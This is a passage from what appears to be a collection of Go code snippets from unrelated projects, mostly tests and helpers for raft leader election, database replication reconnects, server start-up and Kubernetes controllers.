1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership to another node.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func requiresTestStart() {\n\tif !testsStarted {\n\t\tpanic(\"May only be called from within a test case\")\n\t}\n}", "func TestActiveReplicatorReconnectOnStart(t *testing.T) {\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tif testing.Short() {\n\t\tt.Skipf(\"Test skipped in short mode\")\n\t}\n\n\ttests := []struct {\n\t\tname string\n\t\tusernameOverride string\n\t\tremoteURLHostOverride string\n\t\texpectedErrorContains string\n\t\texpectedErrorIsConnectionRefused bool\n\t}{\n\t\t{\n\t\t\tname: \"wrong user\",\n\t\t\tusernameOverride: \"bob\",\n\t\t\texpectedErrorContains: \"unexpected status code 401 from target database\",\n\t\t},\n\t\t{\n\t\t\tname: \"invalid port\", // fails faster than unroutable address (connection refused vs. connect timeout)\n\t\t\tremoteURLHostOverride: \"127.0.0.1:1234\",\n\t\t\texpectedErrorIsConnectionRefused: true,\n\t\t},\n\t}\n\tfor _, test := range tests {\n\t\tt.Run(test.name, func(t *testing.T) {\n\n\t\t\tvar abortTimeout = time.Millisecond * 500\n\t\t\tif runtime.GOOS == \"windows\" {\n\t\t\t\t// A longer timeout is required on Windows as connection refused errors take approx 2 seconds vs. instantaneous on Linux.\n\t\t\t\tabortTimeout = time.Second * 5\n\t\t\t}\n\t\t\t// test cases with and without a timeout. Ensure replicator retry loop is stopped in both cases.\n\t\t\ttimeoutVals := []time.Duration{\n\t\t\t\t0,\n\t\t\t\tabortTimeout,\n\t\t\t}\n\n\t\t\tfor _, timeoutVal := range timeoutVals {\n\t\t\t\tt.Run(test.name+\" with timeout \"+timeoutVal.String(), func(t *testing.T) {\n\n\t\t\t\t\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyAll)\n\n\t\t\t\t\t// Passive\n\t\t\t\t\ttb2 := base.GetTestBucket(t)\n\t\t\t\t\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb2,\n\t\t\t\t\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\t\t\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\t\t\t\t\"alice\": {\n\t\t\t\t\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}},\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt2.Close()\n\n\t\t\t\t\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\t\t\t\t\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\t\t\t\t\tdefer srv.Close()\n\n\t\t\t\t\t// Build remoteDBURL with basic auth creds\n\t\t\t\t\tremoteDBURL, err := url.Parse(srv.URL + \"/db\")\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\t// Add basic auth creds to target db URL\n\t\t\t\t\tusername := \"alice\"\n\t\t\t\t\tif test.usernameOverride != \"\" {\n\t\t\t\t\t\tusername = test.usernameOverride\n\t\t\t\t\t}\n\t\t\t\t\tremoteDBURL.User = url.UserPassword(username, \"pass\")\n\n\t\t\t\t\tif test.remoteURLHostOverride != \"\" {\n\t\t\t\t\t\tremoteDBURL.Host = test.remoteURLHostOverride\n\t\t\t\t\t}\n\n\t\t\t\t\t// Active\n\t\t\t\t\ttb1 := base.GetTestBucket(t)\n\t\t\t\t\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb1,\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt1.Close()\n\n\t\t\t\t\tid, err := base.GenerateRandomID()\n\t\t\t\t\trequire.NoError(t, err)\n\t\t\t\t\tarConfig := db.ActiveReplicatorConfig{\n\t\t\t\t\t\tID: id,\n\t\t\t\t\t\tDirection: db.ActiveReplicatorTypePush,\n\t\t\t\t\t\tRemoteDBURL: remoteDBURL,\n\t\t\t\t\t\tActiveDB: &db.Database{\n\t\t\t\t\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t\t\t\t\t},\n\t\t\t\t\t\tContinuous: true,\n\t\t\t\t\t\t// aggressive reconnect intervals for testing purposes\n\t\t\t\t\t\tInitialReconnectInterval: time.Millisecond,\n\t\t\t\t\t\tMaxReconnectInterval: time.Millisecond * 50,\n\t\t\t\t\t\tTotalReconnectTimeout: timeoutVal,\n\t\t\t\t\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t\t\t\t\t}\n\n\t\t\t\t\t// Create the first active replicator to pull from seq:0\n\t\t\t\t\tar := db.NewActiveReplicator(&arConfig)\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\tassert.Equal(t, int64(0), ar.Push.GetStats().NumConnectAttempts.Value())\n\n\t\t\t\t\terr = ar.Start()\n\t\t\t\t\tassert.Error(t, err, \"expecting ar.Start() to return error, but it didn't\")\n\n\t\t\t\t\tif test.expectedErrorIsConnectionRefused {\n\t\t\t\t\t\tassert.True(t, base.IsConnectionRefusedError(err))\n\t\t\t\t\t}\n\n\t\t\t\t\tif test.expectedErrorContains != \"\" {\n\t\t\t\t\t\tassert.True(t, strings.Contains(err.Error(), test.expectedErrorContains))\n\t\t\t\t\t}\n\n\t\t\t\t\t// wait for an arbitrary number of reconnect attempts\n\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\treturn ar.Push.GetStats().NumConnectAttempts.Value() > 2\n\t\t\t\t\t}, \"Expecting NumConnectAttempts > 2\")\n\n\t\t\t\t\tif timeoutVal > 0 {\n\t\t\t\t\t\ttime.Sleep(timeoutVal + time.Millisecond*250)\n\t\t\t\t\t\t// wait for the retry loop to hit the TotalReconnectTimeout and give up retrying\n\t\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\t\treturn ar.Push.GetStats().NumReconnectsAborted.Value() > 0\n\t\t\t\t\t\t}, \"Expecting NumReconnectsAborted > 0\")\n\t\t\t\t\t}\n\n\t\t\t\t\tassert.NoError(t, ar.Stop())\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t}\n}", "func main() {\n\tcountlog.Info(\"Start raft demo\")\n\ts1 := server.NewRaftServerWithEnv(core.NewServerConf(clusters[1], leader, clusters), env)\n\ts2 := server.NewRaftServerWithEnv(core.NewServerConf(clusters[2], leader, clusters), env)\n\ts3 := server.NewRaftServerWithEnv(core.NewServerConf(clusters[3], leader, clusters), env)\n\ts4 := server.NewRaftServerWithEnv(core.NewServerConf(clusters[4], leader, clusters), env)\n\tl1 := server.NewRaftServerWithEnv(core.NewServerConf(leader, leader, clusters), env)\n\tgo s1.Start()\n\tgo s2.Start()\n\tgo s3.Start()\n\tgo s4.Start()\n\tl1.Start()\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func NewFollower(filename string) (Follower, error) {\n\tf := &follower{\n\t\tfilename: filename,\n\t}\n\n\tif err := f.start(); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn f, nil\n}", "func (sm *State_Machine) LeadTesting(t *testing.T) {\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"rename test\"}\n\n\t//<<<|Id:1000|Status:leader|CurrTerm:6|LoggInd:4|votedFor:0|commitInd:0|>>>\n\n\t/*Sending timeout*/\n\t//-->Expected to send heartbeat msg to all server.\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 3, PreLoggTerm: 2, LeaderCom: 2}}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/* Sending an append request*/\n\t//-->Expeced LoggStore msg and Appendentry request to all servers containg current and previous entry.\n\tentr := []MyLogg{sm.Logg.Logg[sm.LoggInd-1], {6, \"rename test\"}}\n\tentry := Logg{Logg: entr}\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = LoggStore{Index: 4, Data: entr}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 4, PreLoggTerm: 6, LeaderCom: 2, Logg: entry}}\n\tfollTC.expect()\n\n\t/* Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 4, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with higher Term.\n\t//-->Expected to step down to Follower and as follower send Alarm signal.\n\tfollTC.req = VoteReq{Term: 8, CandId: 2000, PreLoggInd: 3, PreLoggTerm: 2}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n}", "func TestClient_SetLeaderURL(t *testing.T) {\n\tc := messaging.NewClient(100)\n\n\t// Nil shouldn't blow up.\n\tvar u *url.URL\n\tc.SetLeaderURL(u)\n\n\ttests := []struct {\n\t\tleader string\n\t\texpected string\n\t}{\n\t\t{\n\t\t\tleader: \"http://localhost\",\n\t\t\texpected: \"http://localhost\",\n\t\t},\n\t\t{\n\t\t\tleader: \"https://localhost\",\n\t\t\texpected: \"https://localhost\",\n\t\t},\n\t\t{\n\t\t\tleader: \"http://localhost:8045\",\n\t\t\texpected: \"http://localhost:8045\",\n\t\t},\n\t\t{\n\t\t\tleader: \"http://127.0.0.1:46684/messaging/messages?replicaID=100\",\n\t\t\texpected: \"http://127.0.0.1:46684\",\n\t\t},\n\t}\n\n\tfor _, tt := range tests {\n\t\tc.SetLeaderURL(MustParseURL(tt.leader))\n\t\tif c.LeaderURL().String() != tt.expected {\n\t\t\tt.Errorf(\"Setting client leader URL failed, expected: %s, got: %s\", tt.expected, c.LeaderURL().String())\n\t\t}\n\t}\n\n}", "func testStartLoggedIn(ctx context.Context, env *shillscript.TestEnv) error {\n\tcr, err := chrome.New(ctx)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Chrome failed to log in\")\n\t}\n\tdefer cr.Close(ctx)\n\n\tif err := upstart.StartJob(ctx, \"shill\"); err != nil {\n\t\treturn errors.Wrap(err, \"failed starting shill\")\n\t}\n\n\treturn nil\n}", "func Follow(r cruntime.Manager, bs bootstrapper.Bootstrapper, cfg config.ClusterConfig, cr logRunner, logOutput io.Writer) error {\n\tcs := []string{}\n\tfor _, v := range logCommands(r, bs, cfg, 0, true) {\n\t\tcs = append(cs, v+\" &\")\n\t}\n\tcs = append(cs, \"wait\")\n\n\tcmd := exec.Command(\"/bin/bash\", \"-c\", strings.Join(cs, \" \"))\n\tcmd.Stdout = logOutput\n\tcmd.Stderr = logOutput\n\tif _, err := cr.RunCmd(cmd); err != nil {\n\t\treturn errors.Wrapf(err, \"log follow\")\n\t}\n\treturn nil\n}", "func doSetup(port int, clusterConfig *kiln.ClusterConfig) (*server.Server, string, error) {\n\timageCreator, err := kiln.NewImageCreatorFromEnv()\n\n\tif err != nil {\n\t\treturn nil, \"\", err\n\t}\n\n\tbaseHost := fmt.Sprintf(\"http://localhost:%d\", port)\n\n\ttestServer := server.NewServer(imageCreator, clusterConfig)\n\n\t//start server in the background\n\tgo func() {\n\t\t//start the server and produce it to the start channel\n\t\ttestServer.Start(port, 10*time.Second)\n\t}()\n\n\t//wait for it to start\n\n\thostBase := fmt.Sprintf(\"%s/organizations\", baseHost)\n\n\tstarted := false\n\n\t//wait for host to start for 10 seconds\n\tfor i := 0; i < 20; i++ {\n\n\t\thost := fmt.Sprintf(\"localhost:%d\", port)\n\n\t\tconn, err := net.Dial(\"tcp\", host)\n\n\t\t//done waiting, continue\n\t\tif err == nil {\n\t\t\tconn.Close()\n\t\t\tstarted = true\n\t\t\tbreak\n\t\t}\n\n\t\ttime.Sleep(500 * time.Millisecond)\n\t}\n\n\tif !started {\n\t\treturn nil, \"\", errors.New(\"Server did not start\")\n\t}\n\n\treturn testServer, hostBase, nil\n}", "func TestAutopeering(t *testing.T) {\n\tn, err := f.CreateAutopeeredNetwork(\"test_autopeering\", 4, 2, func(index int, cfg *framework.AppConfig) {\n\t\tcfg.Autopeering.Enabled = true\n\t})\n\trequire.NoError(t, err)\n\tdefer framework.ShutdownNetwork(t, n)\n\n\tsyncCtx, syncCtxCancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer syncCtxCancel()\n\n\tassert.NoError(t, n.AwaitAllSync(syncCtx))\n}", "func UpdateFollowers(\n\tctx context.Context,\n\tfollowTarget string,\n\trdb *redis.Client,\n\thelixCl *helix.Client,\n) {\n\tconst batchSize = 100\n\tfmt.Println(\"Update of followers started.\")\n\tdefer fmt.Println(\"Update of followers finished.\")\n\n\t// update the followers set\n\tcursor := \"\"\n\tfor {\n\t\tresp, err := helixCl.GetUsersFollows(&helix.UsersFollowsParams{\n\t\t\tAfter: cursor,\n\t\t\tFirst: batchSize,\n\t\t\tToID: followTarget,\n\t\t})\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Error getting followers\")\n\t\t\tcontinue\n\t\t}\n\n\t\tfor _, f := range resp.Data.Follows {\n\t\t\tj, err := json.Marshal(f)\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Could not marshal follows data for user %s\", f.FromName)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := rdb.HMSet(ctx, f.FromID, j).Err(); err != nil {\n\t\t\t\tlog.Printf(\"Error adding follower '%s' to DB (%s)\", f.FromName, err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\t// bail out if we are on the last page, since we're getting\n\t\t// batches of 100 each loop iteration\n\t\tif len(resp.Data.Follows) < batchSize {\n\t\t\tbreak\n\t\t}\n\t\tcursor = resp.Data.Pagination.Cursor\n\t}\n\n\t// update the users set to mark new followers as followers\n\tallUsers, err := rdb.HVals(ctx, \"users\").Result()\n\tif err != nil {\n\t\tlog.Printf(\"Couldn't get list of users from DB (%s)\", err)\n\t\treturn\n\t}\n\n\tfor _, userStr := range allUsers {\n\t\tvar u user.User\n\t\terr := json.Unmarshal([]byte(userStr), &u)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't unmarshal user (%s)\", err)\n\t\t\tcontinue\n\t\t}\n\t\t// Check Followers bucket to see if this id exists\n\t\tfollower, err := isFollower(ctx, rdb, u.ID)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't figure out if user %s is a follower\", u.ID)\n\t\t\tcontinue\n\t\t}\n\t\tu.IsFollower = follower\n\t\tif err := saveUser(ctx, rdb, &u); err != nil {\n\t\t\tlog.Printf(\"Couldn't save user %v (%s)\", u, err)\n\t\t\tcontinue\n\t\t}\n\t}\n}", "func (s *ProducerSuite) TestStartAndStop(c *C) {\n\t// Given\n\tp, err := Spawn(s.ns, s.cfg)\n\tc.Assert(err, IsNil)\n\tc.Assert(p, NotNil)\n\t// When\n\tp.Stop()\n}", "func TestCreateStreamPropagate(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 0)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5050)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Connect and send the request to the follower.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\terr = client.CreateStream(context.Background(), \"foo\", \"foo\")\n\trequire.NoError(t, err)\n\n\t// Creating the same stream returns ErrStreamExists.\n\terr = client.CreateStream(context.Background(), \"foo\", \"foo\")\n\trequire.Equal(t, lift.ErrStreamExists, err)\n}", "func TestActiveReplicatorReconnectOnStartEventualSuccess(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp)\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t})\n\tdefer rt2.Close()\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build remoteDBURL with basic auth creds\n\tremoteDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\n\t// Add basic auth creds to target db URL\n\tremoteDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\tid, err := base.GenerateRandomID()\n\trequire.NoError(t, err)\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: id,\n\t\tDirection: db.ActiveReplicatorTypePushAndPull,\n\t\tRemoteDBURL: remoteDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\t// aggressive reconnect intervals for testing purposes\n\t\tInitialReconnectInterval: time.Millisecond,\n\t\tMaxReconnectInterval: time.Millisecond * 50,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, err)\n\n\tassert.Equal(t, int64(0), ar.Push.GetStats().NumConnectAttempts.Value())\n\n\t// expected error\n\tmsg401 := \"unexpected status code 401 from target database\"\n\n\terr = ar.Start()\n\tdefer func() { assert.NoError(t, ar.Stop()) }() // prevents panic if waiting for ar state running fails\n\tassert.Error(t, err)\n\tassert.True(t, strings.Contains(err.Error(), msg401))\n\n\t// wait for an arbitrary number of reconnect attempts\n\twaitAndRequireCondition(t, func() bool {\n\t\treturn ar.Push.GetStats().NumConnectAttempts.Value() > 3\n\t}, \"Expecting NumConnectAttempts > 3\")\n\n\tresp := rt2.SendAdminRequest(http.MethodPut, \"/db/_user/alice\", `{\"password\":\"pass\"}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\n\twaitAndRequireCondition(t, func() bool {\n\t\tstate, errMsg := ar.State()\n\t\tif strings.TrimSpace(errMsg) != \"\" && !strings.Contains(errMsg, msg401) {\n\t\t\tlog.Println(\"unexpected replicator error:\", errMsg)\n\t\t}\n\t\treturn state == db.ReplicationStateRunning\n\t}, \"Expecting replication state to be running\")\n}", "func TestServerStartEvent(t *testing.T) {\n\tvar err error\n\terr = testcert.GenerateCert(\"mail2.guerrillamail.com\", \"\", 365*24*time.Hour, false, 2048, \"P256\", \"../../tests/\")\n\tif err != nil {\n\t\tt.Error(\"failed to generate a test certificate\", err)\n\t\tt.FailNow()\n\t}\n\tdefer cleanTestArtifacts(t)\n\tmainlog, err = getTestLog()\n\tif err != nil {\n\t\tt.Error(\"could not get logger,\", err)\n\t\tt.FailNow()\n\t}\n\n\tif err := ioutil.WriteFile(\"configJsonA.json\", []byte(configJsonA), 0644); err != nil {\n\t\tt.Error(err)\n\t\tt.FailNow()\n\t}\n\tcmd := &cobra.Command{}\n\tconfigPath = \"configJsonA.json\"\n\tgo func() {\n\t\tserve(cmd, []string{})\n\t}()\n\tif _, err := grepTestlog(\"Listening on TCP 127.0.0.1:3536\", 0); err != nil {\n\t\tt.Error(\"server didn't start\")\n\t}\n\t// now change the config by adding a server\n\tconf := &guerrilla.AppConfig{} // blank one\n\tif err = conf.Load([]byte(configJsonA)); err != nil { // load configJsonA\n\t\tt.Error(err)\n\t}\n\tnewConf := conf // copy the cmdConfg\n\tnewConf.Servers[1].IsEnabled = true\n\tif jsonbytes, err := json.Marshal(newConf); err == nil {\n\t\t//fmt.Println(string(jsonbytes))\n\t\tif err = ioutil.WriteFile(\"configJsonA.json\", jsonbytes, 0644); err != nil {\n\t\t\tt.Error(err)\n\t\t}\n\t} else {\n\t\tt.Error(err)\n\t}\n\t// send a sighup signal to the server\n\tsigHup()\n\n\t// see if the new server started?\n\tif _, err := grepTestlog(\"Listening on TCP 127.0.0.1:2228\", 0); err != nil {\n\t\tt.Error(\"second server didn't start\")\n\t}\n\n\t// can we talk to it?\n\tif conn, buffin, err := test.Connect(newConf.Servers[1], 20); err != nil {\n\t\tt.Error(\"Could not connect to new server\", newConf.Servers[1].ListenInterface)\n\t} else {\n\t\tif result, err := test.Command(conn, buffin, \"HELO example.com\"); err == nil {\n\t\t\texpect := \"250 enable.test.com Hello\"\n\t\t\tif strings.Index(result, expect) != 0 {\n\t\t\t\tt.Error(\"Expected\", expect, \"but got\", result)\n\t\t\t}\n\t\t} else {\n\t\t\tt.Error(err)\n\t\t}\n\t}\n\t// shutdown and wait for exit\n\td.Shutdown()\n\n\tif _, err := grepTestlog(\"Backend shutdown completed\", 0); err != nil {\n\t\tt.Error(\"server didn't stop\")\n\t}\n\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\t// Your code here (2B).\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\n\tindex := -1\n\tterm := rf.currentTerm\n\tisLeader := rf.state == LEADER\n\tif isLeader {\n\t\tindex = rf.getLastLogIndex() + 1\n\t\tDPrintf(\"=================== leader server %v start command: %v ====================\", rf.me, command)\n\t\trf.logs = append(rf.logs, LogEntry{Term: term, Command: command, Index: index})\n\t\trf.persist()\n\t}\n\treturn index, term, isLeader\n}", "func ExampleServersClient_BeginStart() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armmariadb.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tpoller, err := clientFactory.NewServersClient().BeginStart(ctx, \"TestGroup\", \"testserver\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t_, err = poller.PollUntilDone(ctx, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to pull the result: %v\", err)\n\t}\n}", "func startServerAndControllers(t *testing.T) (\n\t*kubefake.Clientset,\n\twatch.Interface,\n\tclustopclientset.Interface,\n\tcapiclientset.Interface,\n\t*capifakeclientset.Clientset,\n\tfunc()) {\n\n\t// create a fake kube client\n\tfakePtr := clientgotesting.Fake{}\n\tscheme := runtime.NewScheme()\n\tcodecs := serializer.NewCodecFactory(scheme)\n\tmetav1.AddToGroupVersion(scheme, schema.GroupVersion{Version: \"v1\"})\n\tkubefake.AddToScheme(scheme)\n\tobjectTracker := clientgotesting.NewObjectTracker(scheme, codecs.UniversalDecoder())\n\tkubeWatch := watch.NewRaceFreeFake()\n\t// Add a reactor for sending watch events when a job is modified\n\tobjectReaction := clientgotesting.ObjectReaction(objectTracker)\n\tfakePtr.AddReactor(\"*\", \"jobs\", func(action clientgotesting.Action) (bool, runtime.Object, error) {\n\t\tvar deletedObj runtime.Object\n\t\tif action, ok := action.(clientgotesting.DeleteActionImpl); ok {\n\t\t\tdeletedObj, _ = objectTracker.Get(action.GetResource(), action.GetNamespace(), action.GetName())\n\t\t}\n\t\thandled, obj, err := objectReaction(action)\n\t\tswitch action.(type) {\n\t\tcase clientgotesting.CreateActionImpl:\n\t\t\tkubeWatch.Add(obj)\n\t\tcase clientgotesting.UpdateActionImpl:\n\t\t\tkubeWatch.Modify(obj)\n\t\tcase clientgotesting.DeleteActionImpl:\n\t\t\tif deletedObj != nil {\n\t\t\t\tkubeWatch.Delete(deletedObj)\n\t\t\t}\n\t\t}\n\t\treturn handled, obj, err\n\t})\n\tfakePtr.AddWatchReactor(\"*\", clientgotesting.DefaultWatchReactor(kubeWatch, nil))\n\t// Create actual fake kube client\n\tfakeKubeClient := &kubefake.Clientset{Fake: fakePtr}\n\n\t// start the cluster-operator api server\n\tapiServerClientConfig, shutdownServer := servertesting.StartTestServerOrDie(t)\n\n\t// create a cluster-operator client\n\tclustopClient, err := clustopclientset.NewForConfig(apiServerClientConfig)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\n\t// create a cluster-api client\n\tcapiClient, err := capiclientset.NewForConfig(apiServerClientConfig)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\n\tfakeCAPIClient := &capifakeclientset.Clientset{}\n\n\t// create informers\n\tkubeInformerFactory := kubeinformers.NewSharedInformerFactory(fakeKubeClient, 10*time.Second)\n\tbatchSharedInformers := kubeInformerFactory.Batch().V1()\n\tclustopInformerFactory := clustopinformers.NewSharedInformerFactory(clustopClient, 10*time.Second)\n\tcapiInformerFactory := capiinformers.NewSharedInformerFactory(capiClient, 10*time.Second)\n\tcapiSharedInformers := capiInformerFactory.Cluster().V1alpha1()\n\n\t// create controllers\n\tstopCh := make(chan struct{})\n\tt.Log(\"controller start\")\n\t// Note that controllers must be created prior to starting the informers.\n\t// Otherwise, the controllers will not get the initial sync from the\n\t// informer and will time out waiting to sync.\n\trunControllers := []func(){\n\t\t// infra\n\t\tfunc() func() {\n\t\t\tcontroller := infracontroller.NewController(\n\t\t\t\tcapiSharedInformers.Clusters(),\n\t\t\t\tbatchSharedInformers.Jobs(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t\t// master\n\t\tfunc() func() {\n\t\t\tcontroller := mastercontroller.NewController(\n\t\t\t\tcapiSharedInformers.Clusters(),\n\t\t\t\tcapiSharedInformers.MachineSets(),\n\t\t\t\tbatchSharedInformers.Jobs(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t\t// components\n\t\tfunc() func() {\n\t\t\tcontroller := componentscontroller.NewController(\n\t\t\t\tcapiSharedInformers.Clusters(),\n\t\t\t\tcapiSharedInformers.MachineSets(),\n\t\t\t\tbatchSharedInformers.Jobs(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t\t// nodeconfig\n\t\tfunc() func() {\n\t\t\tcontroller := nodeconfigcontroller.NewController(\n\t\t\t\tcapiSharedInformers.Clusters(),\n\t\t\t\tcapiSharedInformers.MachineSets(),\n\t\t\t\tbatchSharedInformers.Jobs(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t\t// deployclusterapi\n\t\tfunc() func() {\n\t\t\tcontroller := deployclusterapicontroller.NewController(\n\t\t\t\tcapiSharedInformers.Clusters(),\n\t\t\t\tcapiSharedInformers.MachineSets(),\n\t\t\t\tbatchSharedInformers.Jobs(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t\t// awselb\n\t\tfunc() func() {\n\t\t\tcontroller := 